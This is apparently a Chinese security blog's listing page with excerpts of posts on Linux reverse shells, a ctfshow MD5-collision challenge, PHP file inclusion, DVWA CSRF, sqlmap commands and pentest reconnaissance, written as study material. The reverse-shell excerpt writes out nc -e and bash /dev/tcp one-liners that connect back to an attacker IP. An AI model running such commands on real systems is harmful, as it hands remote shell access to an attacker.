- 博客(6)
- 收藏
- 关注
RSS订阅原创 Linux多姿势反弹shell
前言以下反弹shell的各种方法是小R收集到的,部分没有复现成功的方法没有放上来,待复现成功后会慢慢把文章完善,如有错误请帮忙指出。1.Nc -e反弹攻击端:nc -lvp 23333受害端:nc -e /bin/bash 192.168.154.129 233332.Bash -i反弹攻击端:nc -lvp 23333受害端:bash -i >/dev/tcp/192.168.154.129/23333 0>&1 2>&1(b
2020-12-26 14:08:08
1337
原创 ctfshow-web5
靶场地址:ctf.show1.读代码v1:参数要求为字母。v2:参数要求为数字。当v1和v2的MD5相同时,打印出flag的值。2.md5碰撞不同数据的md5是不会相等的,但是这边用的是==,如果得出的md5值是"0e"+"数字" 的格式,就会被当作科学计数法,值都为0。举例:只要找到对应格式的MD5值的全字母和全数字的值就可以了。我用python写了一个自动化程序找出对应格式的md5值,只要修改对应的payload就可以了。好家伙,这几率和买彩票一样,对应全数字和全字母一共跑了几个
2020-12-20 14:40:01
598
原创 PHP安全:简谈文件包含漏洞
简谈文件包含漏洞前言0x01 危险的函数0x02 四种函数的区别0x03 本地文件包含和远程文件包含0x04 练练手吧总结前言文件包含,算是“注入攻击”中的典型代表之一了,这种漏洞在PHP语言上出现比较多,因为PHP语言在设计上一开始没有过多地考虑安全性,时至今日,尽管PHP社区和开发者一直在安全性上做出努力,不过遗留下来的问题还是不少。本篇主要讲解PHP文件包含漏洞的相关知识。(替兄弟默哀三分钟= =、)0x01 危险的函数文件包含可能出现在JSP、PHP、ASP等语言中,常见的导致文
2020-12-18 18:06:15
717
原创 DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)
DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)前言0x01 CSRF(跨站点请求伪造)CLASS LOWCLASS:MEDIUMCLASS:HIGH总结前言这时肯定有小伙伴要说了,“哎呀你怎么第二关的命令注入还没讲就直接讲第三关了???小R你不讲5的,我劝你耗子尾汁……”开个玩笑,因为最近面试经常被问到关于CSRF的问题,也重新对该部分的理论基础复习了一下,想着趁热打铁,先写这一部分,这样写的过程思路也可能会相对清晰一点,下一篇一定写第二关= =(狗头保命)。B
2020-12-14 19:32:04
549
原创 sqlmap学习笔记:常用命令
文章目录前言0x01 使用环境0x02 判断注入点0x03 常用命令1.查询当前数据库2.查询所有数据库3.爆表名4.爆字段名5.脱库6.获取数据库用户密码(加爆破)0x04 总结前言sqlmap可以说是sql自动化注入工具的不二之选了,通常sql注入的过程中,也没有人绝对地只用手注或者自动化注入,通常是根据实际情况两者配合使用,这篇文章以POST类型注入为例子,示范sqlmap常用命令的使用方法。0x01 使用环境测试网页:sqli-labs的第11关。操作系统:kali(由于win环境
2020-12-08 17:58:50
1069
原创 细谈渗透测试的前期工作——信息收集
细谈渗透测试的前期工作——信息收集前言0x01 收集什么信息0x02 作用和收集方法总结前言都说学安全的,查资料找信息什么的都是基本功,收集信息的能力都是杠杠的,经常网上有什么热门的事情,小伙伴们都会来找我帮他们找点瓜吃,也常常让我帮忙找特定的一些岛国教育资料,真是工具人实锤了。。咳咳扯远了,扯远了。所谓知己知彼,百战不殆,要做好渗透测试,前期的信息收集工作可以说是非常重要了,在面试中这也是高频出现的问题,可能感觉很简单,但是其中还是有很多不可忽略的小细节,往往就是这些小细节决定能否成功渗透的一个
2020-12-02 16:31:26
694
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人